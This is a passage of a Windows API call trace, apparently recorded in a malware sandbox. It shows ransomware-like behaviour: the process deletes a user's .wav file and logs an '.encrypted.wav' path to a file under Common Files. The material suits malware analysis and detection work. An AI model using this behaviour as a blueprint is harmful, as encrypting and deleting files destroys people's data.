wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.831] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.831] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\e6du.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.831] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.832] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.832] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.832] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.833] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.833] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.833] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.833] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.833] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.833] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFilePart=0x0) returned 0x3f [0038.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x16d9c2e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="E6Du.wav", cAlternateFileName="")) returned 0x7c2100 [0038.833] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\e6du.wav")) returned 1 [0038.835] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x16d9c2e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="E6Du.wav", cAlternateFileName="")) returned 0 [0038.835] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.835] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.836] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.836] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.836] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.836] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.836] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.836] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0038.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.836] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.837] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x26b9, lpOverlapped=0x0) returned 1 [0038.837] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x26b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.837] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.encrypted.wav\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f3630 [0038.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.encrypted.wav\r\n", cchWideChar=76, lpMultiByteStr=0x7f3630, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 76 [0038.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0038.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.837] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4b, lpOverlapped=0x0) returned 1 [0038.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.838] CloseHandle (hObject=0x140) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.839] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.839] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.840] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.840] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.840] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.840] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.841] 